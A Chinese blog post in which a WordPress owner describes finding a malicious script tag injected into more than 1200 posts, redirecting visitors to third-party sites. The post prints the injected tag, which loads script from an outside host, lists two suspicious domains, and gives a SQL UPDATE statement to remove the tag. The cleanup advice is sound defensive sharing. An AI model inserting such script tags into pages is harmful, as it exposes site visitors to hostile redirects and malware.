WordPress重定向漏洞

今天访问自己blog时突然发现特慢,半天右栏都没加载出来。看了下状态栏,发现卡在一个url上过不去(http://ae.awaue.com/7),我想了又想,重来没有调用过外站资源,特别时这个陌生的站。第一反应就是可能被挂马了,上网查了一下没有太具体的说法,访问了下上面这个url也打不开,心生可疑。因为首页里只发现两条如下脚本,想实在没有方法解决,就先干掉这两个,过段时间看看情况。

<script src="http://ae.awaue.com/7"></script>

症状:

  • 浏览你网站文章的用户可能被重定向的第三方网站。(我今天遇到过一次,开始还纳闷我是点了什么跳到一个不认识的网站去的)
  • 也可能被重定向到googlesearch.com,不过这个已被禁用。

但好在最后还是依赖(mt)自己的wiki解决了这个问题,我绝非第一个遇到这问题,以后可能会复发,别的WPer也可能遇到,留个存档,出问题好回查。

解决方案如下,范讲一下,不只针对(mt)主机:

  • 登录你主机的管理后台,进入数据库管理,也就是mysqladmin
  • 在左边列表里找到你的wordpress所在数据库,如db_blog
  • 点击进入后,在顶部找到”SQL”一项,点击
  • 然后我们在输入框里输入以下语句,目的查找wp_posts里所有信息,并替换掉其中有害信息:

UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ae.awaue.com/7"></script>', ' ')

  • 接下来运行这段语句
  • 最后看一下影响了多少行,如果是0,说明你还没中招。我的跑了一下共替换了1200多条……

需要注意的是:上面的例子语句是举的默认情况,如果你的表名不是以wp_开头的,请换成你自己的,不要直接复制粘贴。

目前已发现的可疑脚本有以下两个:

  • ae.awaue.com/7
  • ie.eracou.com/3

如果未来发现有新的可疑脚本,请随时留意这里的更新

我来第1个赞
WordPress重定向漏洞

分享到朋友圈


发表评论

电子邮件地址不会被公开。 必填项已用*标注

*